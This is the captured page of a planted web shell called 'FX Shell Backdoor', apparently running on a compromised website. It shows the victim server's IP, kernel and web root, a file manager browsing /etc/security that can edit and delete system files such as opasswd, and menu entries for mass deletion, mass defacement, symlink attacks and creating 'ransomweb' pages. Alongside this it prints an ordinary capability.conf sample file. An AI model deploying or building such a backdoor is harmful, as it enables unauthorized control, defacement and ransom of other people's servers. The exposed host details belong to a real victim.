FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
etc
/
security
/
Upload
Buat File
Buat Folder
Buat Ransomweb
# # /etc/security/capability.conf # # this is a sample capability file (to be used in conjunction with # the pam_cap.so module) # # In order to use this module, it must have been linked with libcap # and thus you'll know about Linux's capability support. # [If you don't know about libcap, the sources for it are here: # # http://www.kernel.org/pub/linux/libs/security/linux-privs/ # # .] # # Here are some sample lines (remove the preceding '#' if you want to # use them ## user 'morgan' gets the CAP_SETFCAP inheritable capability (commented out!) #cap_setfcap morgan ## user 'luser' inherits the CAP_DAC_OVERRIDE capability (commented out!) #cap_dac_override luser ## 'everyone else' gets no inheritable capabilities (restrictive config) none * ## if there is no '*' entry, all users not explicitly mentioned will ## get all available capabilities. This is a permissive default, and ## possibly not what you want... On first reading, you might think this ## is a security problem waiting to happen, but it defaults to not being ## so in this sample file! Further, by 'get', we mean 'get in their inheritable ## set'. That is, if you look at a random process, even one run by root, ## you will see it has no inheritable capabilities (by default): ## ## $ /sbin/capsh --decode=$(grep CapInh /proc/1/status|awk '{print $2}') ## 0000000000000000= ## ## The pam_cap module simply alters the value of this capability ## set. Including the 'none *' forces use of this module with an ## unspecified user to have their inheritable set forced to zero. ## ## Omitting the line will cause the inheritable set to be unmodified ## from what the parent process had (which is generally 0 unless the ## invoking user was bestowed with some inheritable capabilities by a ## previous invocation).
limits.d
Choose...
Rename
Delete
Now
namespace.d
Choose...
Rename
Delete
Now
access.conf
Choose...
Edit
Rename
Delete
Now
capability.conf
Choose...
Edit
Rename
Delete
Now
faillock.conf
Choose...
Edit
Rename
Delete
Now
group.conf
Choose...
Edit
Rename
Delete
Now
limits.conf
Choose...
Edit
Rename
Delete
Now
limits.d
Choose...
Edit
Rename
Delete
Now
namespace.conf
Choose...
Edit
Rename
Delete
Now
namespace.d
Choose...
Edit
Rename
Delete
Now
namespace.init
Choose...
Edit
Rename
Delete
Now
opasswd
Choose...
Edit
Rename
Delete
Now
pam_env.conf
Choose...
Edit
Rename
Delete
Now
sepermit.conf
Choose...
Edit
Rename
Delete
Now
time.conf
Choose...
Edit
Rename
Delete
Now